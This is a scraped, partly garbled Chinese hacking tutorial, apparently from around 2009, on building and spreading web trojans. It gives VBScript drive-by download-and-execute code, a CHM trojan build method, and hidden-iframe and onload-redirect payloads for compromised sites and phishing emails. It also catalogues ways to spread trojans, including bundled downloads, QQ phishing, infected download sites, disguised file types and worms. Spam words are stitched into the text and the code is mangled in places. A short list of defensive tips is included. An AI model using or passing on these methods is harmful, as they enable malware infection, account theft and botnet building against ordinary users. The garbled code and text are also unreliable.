2009-08-19 22:30最简单的也就是用ChmBuilder这个软件来制作chm木马了,首先我们要配置好一个木马服务端,我再这里就拿QQ杀手7.1版说下把。关于他的使用和配置我就不多说了把,下载了这软件都自带有帮助文件的,看几遍就会明白的了。然后生成服务端,假设我生成的木马服务端为mm.exe,接着打开ChmBuilder选择我们的mm
.exe然后点生成,就会在相同目录下自动生成一个mm.chm和mm.htm (注意:这几个文件可不要轻易去点哦,万一出了什么后果,不要偶~~~……^_^) 接着就把mm.chm和mm.htm传到自己的空间,如果没空间有肉鸡也是可以滴,建议最好用肉鸡,这样万一对方发现了也是你发现你肉鸡。但是有的空间还是比较严格的,在上传时会发现那个mm.htm并不存在,那就是被对方的杀毒软件查杀了把。 到了这里我们就需要另外一个软件了htmtool
网页加密程序,选择源文件为mm.htm目标文件m.htm然后点加密,程序就会在mm.htm目录下生成一个用javascript加密后的m.htm,然后把m.htm传肉鸡或空间里去把。 我在本机测试。_blank>127.0.0.1/m.htm就是我们的网页木马地址了,只要把这个发给别人,对方浏览了就会中了我们的木马。 但是对方会相信你吗?现在的网民安全意识也稍微提高了点,对于你发来的站都不会轻易去点。 所以呢~~还是自己动手把。入侵~~~~挂马!嘿嘿~~对不起那些站长了。 相信大家也都知道这个名词把.....不知道的就....别我哦。
一般在你入侵了一个站拿到了webshell的时候,有的人也就是改下主页来满足自己的虚荣心把。下面来说挂马把。最常见的 挂站代码如下 :
把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>127.0.0.1/m.htm。而_blank>127.0.0.1/m.htm也就是我门的网页木马了,那width="0" height="0"又是什么意思呢?懂点英文的朋友也应该知道了把,width就是宽而height自然就是高了。我们把它设置为0也就是不显示了,对方也就看不见我们的这个页面,木马也就会被下载到本地。
不过感觉这个方法已经过失了,现在的站长在发现自己的站被挂了木马后,如果主页代码过多,只要搜索iframe就能到了我们的木马了,一个del,哈哈~~~~玩完了。
所以,下面再介绍几个把。
单独利用chm这个文件来达到盗号目的。假设我们的木马服务端还是为mm.exe然后在他相同目录下建一个mm.htm文件,代码如下 当然你也可以把mm.exe和mm.htm换成是别的文件名。然后用QuickCHM这个软件来编译成为chm文件。(这些工具在google都能搜索到的)然后chm向导。选中*.*,项目文件夹就是刚才那两个mm.exe和mm.htm
所在的目录了。
然后下一步,htm文件在上,exe文件在下,接着可以编译他了。
编辑成功后千万不要点“是”给运行了。那样自己就中了马了~~然后就会发现原来的2个文件已经多出了四个
newproject.chm,newproject.hhc ,newproject.hhk ,newproject.hhp 其实最后三个是没用的,删了他把只留一个newproject.chm ,然后把他改任意名上传空间。
但这个挂马就不能用上面的那段代码了。假设我做好的chm木马为_blank>127.0.0.1/mm.chm
那就用以下代码
<br><object data="ms-its:mhtml:file://c:\foo.mht!_blank>127.0.0.1/mm.chm::/test.htm" type="text/x-scriptlet"></object>
<br> </div><div > </div><div > </div><div > </div><div > </div><div > </div><div > </div><div >
【学网教程】
<!-- 文章画中画块幅 -->
以前写了一篇文章,讲了关于怎样用最简单的方法获取对方的管理权限,里面用到了网页木马,最近有许多网友问我怎样制作网页木马,就这个问题我发表篇比较简单易懂的文章,希望大家珍惜我的劳动成果。
我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.
首先我们需要编写几个简单的文件
一。名字为abc.abc的文件
<html>
<script language="vbscript">
Function HttpDoGet(url)
set oReq = CreateObject("Microsoft.XMLHTTP")
oReq.open "GET",url,false
oReq.send
If oReq.status=200 then
spomseBody
Savefile HttpDoGet,"c:\"
End If
Set oReq=nothing
End Function
sub SaveFile(str.fName)
Set objStream = CreateObject("ADODB.Stream")
objStream.Type =1
objStream.Open
objStream.write str
objStream.SaveToFile fName.2
objStream.Close()
set objStream = nothing
exewin()
End sub
Sub exewin()
set wshshell=createobject ("wscript.shell" )
a=wshshell.run (" /c c:\",0)
b=wshshell.run (" /c del c:\win.hta",0)
window.close
End Sub
HttpDoGet "127.0.0."
煎药锅
</script>
</html>
二。名字为test.htm的文件
<html><body>
木马运行测试!(这句话可以改成你想说的)
<object date="127.0.0.1/win
.
test";;;></object>
</body></html>
三。名字为st的文件
<html>
<body>
<script language="vbscript">
Function HttpDoGet(url)
set oReq = CreateObject("Microsoft.XMLHTTP")
oReq.open "GET",url,false
oReq.send
If oReq.status=200 then
HttpDoGet,"c:\win.hta"
大厦扇Set oReq=nothing
End if
end function
sub SaveFile(str,fName)
Dim fso, tf
S e t f s o = C r e a t e O bj e c t(Scripting.FileSystemObject")
Set tf = fso.CreateTextfile(fName,True)
tf.Write str
tf.Close
exewin()
End sub
Sub exewin()
set wshshell=createobject ("wscript.shell" )
a=wshshell.run (" /c c:\win.hat",0)
window.close
End Sub
HttpDoGet("127.0.0.1/abc.abc")
</script>
</body>
</html>
四。名字为的木马程序。
果蔬包装机
晕...这个就不用我提供了吧,你想用什么木马就把他的名字换成传上去就可以了。
服务器的文件列表
test.htm:对外发布的网页
abc.abc下载二进制的木马文件,并执行
<:木马程序。
上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了!
最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。
有许多朋友多遇见过,说什么赠送Q号或者玩网游的时候里面有人喊赠送好东东在XXX网址,其实那上面所说的例子用的就是这种原理,不知不觉中你机器上的所有有关于密码或者指定名词的东西全发送到对方指定的邮件箱里去了
看完后是否觉得这种木马太危险,甚至有种想把网线拔掉的感觉那?呵呵,其实了解了网页木马的工作原理后我们就不难防护他,看完以上内容后就可以得出一个结论,网页木马主要利用IE的漏洞来实现的,所以在预防的时候一定要做到以下几点就可以保证上网的安全了,
A。安装IE的最新版本并且随时下在才做系统和IE的补丁程序。
B。不随便登陆不熟悉朋友送来的网站,对于熟悉的朋友也要小心哦。
C。不随便登陆黑客网站(^_^黑基除外了啦,我担保的...),站,尤其一些卖外挂,卖木马的网站。
D。不随便打开和预览有附件的邮件。
E。安装防火墙和杀毒软件的最新版本,经常进行升级和查毒
传播
本文章总节归纳了目前最流行的木马传播技术以及以后木马传播技术
的发展趋势,
内容相当丰富.相信看完本教程你一定会成为养鸡专业户.
一.目前流行木马传播技术.
1.用BT制作木马种子
利用BT制作木马种子的教程网上也发布了很多,这里主要一款具有诱惑性的软件
然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.
2.利用PP共享自己捆了木马的软件或电影.
方法同BT一样,要诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人
家就会通过搜索到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePla
ye木马制作.在黑鹰可以到.当你一打开我们的电影时就会打开我们制作过的网页木
马.这样看电影也会中我们的马.
3.利用QQ邮箱传播木马.
这里主要点HTML格式----在里面写上以下这段代码:
<body onload="window.location='你的网页木马地址';"> </body>
当人家一打开你发过去的邮件时,就会中我们的木马.
4.QQ发网页木马。
首先,你要申请多个QQ号,然后款QQ消息发器(黑鹰网站可以到大量相关QQ
发信息软件,)再然后要加上非常具有诱惑性的消息(肉鸡的多与少与这个直接相关
,),骗取人家点你的网址。最后,在晚上时可以挂在电脑上发带有网页木马的信
息。相信只要你的信息够诱惑,肉鸡也是成的。
5.利用163邮箱传播网页木马。集装箱内衬袋
同样,这里用HTML格式,然后填上以下代码:
</html><iframe src="你的网页木马地址" name="zhu" width="0" height="0"
frameborder="0">三维激光扫描技术
对方只要一打开,就会中我们的网页木马。
这里发送邮件时注意一些技巧,我们要加入一些社会工程会。比如对方是爱好车的,
你就在邮件标题上写上关于车的诱惑性标题。目的只有一个,让他点我们带有网页木
马的邮件。
6.利用邮箱发我们的网页木马。
这里要用到论坛邮箱提取器,这类工具黑鹰也有下载,大家可以一下。提取大量
邮箱后,配合FOXMAIL这款软件进行发传播带有网页木马的邮件。这里也要注意技
巧,比如在一个游戏论坛提取的邮箱,你就可以伪装本论坛发给广大游戏玩家,提供
最新游戏外挂下载.然后写上自己的网页木马.大部分都认为信息的真实性而点击.从
而中我们的木马. 这里还可以配合利用HTML格式发我们的网页木马效果可更佳!
7.捆绑欺骗
这也是比较常用的传播木马技术.把木马捆在游戏,流行软件上,配合以上方法,QQ,邮
箱,BT,论坛,等发布捆了木马的软件.骗取点我们的软件,这样也就同时中了我们的木
马.关于捆绑技术,本人做了三个非常具体详细的语音动画教程.不懂的可以在黑鹰查
本人的捆绑
系列专辑教程.
8.攻破下载点,捆上木马放入下载点.
当我们入侵到一些网站时,看看是否开放21服务,也就是是否提供FTP服务.若入侵到
这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的木马然后放入下载点
等待人家上钩吧!该方法抓鸡的速度也非常快.
9.钓鱼式欺骗别人点击你的网页木马地址或木马.
钓鱼式欺骗攻击,也是国内最新发现的一种攻击手法.主要利用社会工程会中的信任
关系骗他点击.具体的利用方法:当盗了人家的QQ号,你可以看看有几个,然后在里
放上自己捆绑的木马.接着在里发几条诱惑性的信息,比如最新申请6位QQ号软件,
由于是在同一个,可能他们对该QQ号主人有一定的信任度,所以点击的可能性一定
很大.若该QQ号主人是主或是管理员,哈哈,我们来个更毒的,干脆在公告上写上自己
的网页木马地址,然后说本刚建的专用网站!由于是主,他们对他的信任度可想而
知.应该都会点的吧!还有一招,在他QQ的个人资料上或个人签名上填上自己的网页木
马,然后说刚建的个人网站.相信很多好友都会自动点击吧!
10.网站主页挂马
这个应该不用具体介绍吧,教程有N多.入侵到一个网站得到WEBSHELL后,接下来大家
是不是都忙着首页挂马了.
11.论坛漏洞挂马
这里主要利用论坛的一些漏洞进行挂马,比如最近的动网前台提升管理员,然后挂马,
动网的个人资料过虑不严挂马,还有投票挂马等等.利用这些漏洞进行挂马.也有相关
教程,不是很清楚的可以在黑鹰到.
12.文件类型伪装
这里主要把一些木马服务端和一些文本文件捆绑在一起,然后通后自解压方式或捆绑
器制作成文本文件类型的可执行文件.但他以为打开一个文本文件时,虽然能正常运行
文本文件,其实已经中了我们的木马.真是神不知鬼不觉!本人也做过文件类型欺骗的
动画教程.不是很清楚的也可以在黑鹰或动画吧到本人的相关的教程.当然,还要以
伪装成其它的类型,比如把木马制作成BMP图片.BAT格式等.只要他一运行就会中
我们的马.
14.其它的传播技术:比如制作图片木马,也有专门的图片木马制作工具,RM木马制作
黑鹰也有相关教程,RealOnePlayer木马制作,FLASH木马制作.也有专门的制作工具,
网上可以到相关工具.这些也是比较常用的传播技术.只要你有这方面的思路,都可
以在网上到相关资料,自己尝试制作.
二.新型高级木马传播技术
下面介绍几种比较高级的木马传播技术.由于有一定的技术难度,所以隐蔽性比较强,
传播速度也快,而且也几乎不会被杀毒软件查杀.
1.在WORD文档中加入木马文件
这种
侧翻手机
方法非常隐蔽,在WORD文档尾加入木马文件,只要别人点击这个所谓的WORD文件就
会中木马,这种方法主要是通过把一个EXE格式的木马文件接在一个DOC文件的末尾,使
别人察觉不到木马的存在,因此使之上当受骗.具体实现方法,比较复杂.本人也在进一
步的研究之中.相信在不久这种方法就会流行起来.现在主要被一些高手使用.
2.黑客工具绑木马
其实这本来算不上高级的方法,但最近发现很多黑客软件发布站,捆了木马的工具躲过
管理员的检测.照样发布出来,想像危害性有多大.其实他们就是利用人性的弱点.黑客
工具本来被杀毒软件查杀,捆了木马的工具被查杀就不觉得奇怪了.就会放松警惕.从
而被他们利用.这一招是他们把黑客中的社会工程学利用的"恰到好处"!
3.用Z-file伪装加密木马程序
z-file伪装加密软件是台湾华顺科技产品,其经过将文件压缩加密之后,再以bmp图像
文件格式显示出来,扩展名是bmp,执行后是幅普通的图像.黑客会将木马程序和小游戏
合拼,再用z-file加密及将此"混合体"发给受害者,由于看上去是图像文件,受害者往
往不以为然,打开后又只是一般的图片,最可怕的地方还在于就连杀毒软件也检测不出
它内藏木马.
4.伪装成应用程序扩展组件
此类属于最难识别的特洛伊木马,也是骗术最高的木马,当然技术实现也有相当的难度
由于涉及到编程,所以我这里只简单介绍原理,以供参考.
采用内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程,或者挂接PSAPI,实
现木马程序的隐藏.
5.通过QQ病毒,QQ蠕虫,QQ尾巴或邮箱病毒,蠕虫进行传播.
相信利用这些技术进行传播木马的速度是最快的.这里要下载病毒,蠕虫源代码.进行
分析.修改.加入我们的网页木马地址.然后传播到网上,这样就会一传十,十传百,指数
级上升,自动为我们传播木马.这种传播速度是惊人的.网上也可到相关QQ蠕虫制作
器,菜鸟朋友就可以直接制作自己的带有网页木马的蠕虫了.最近的唐山黑客就是利用
QQ尾巴传播自己的木马,感染并操控了四万多台民用电脑.进行对北京的一家音乐网站
进行分布式DDOS攻击.利用该技术是相当高级的,速度也是最快的.
家居服货源网www.shuiyishop 整理
豫公网安备41160202000603
站长QQ:729038198
关于我们
投诉建议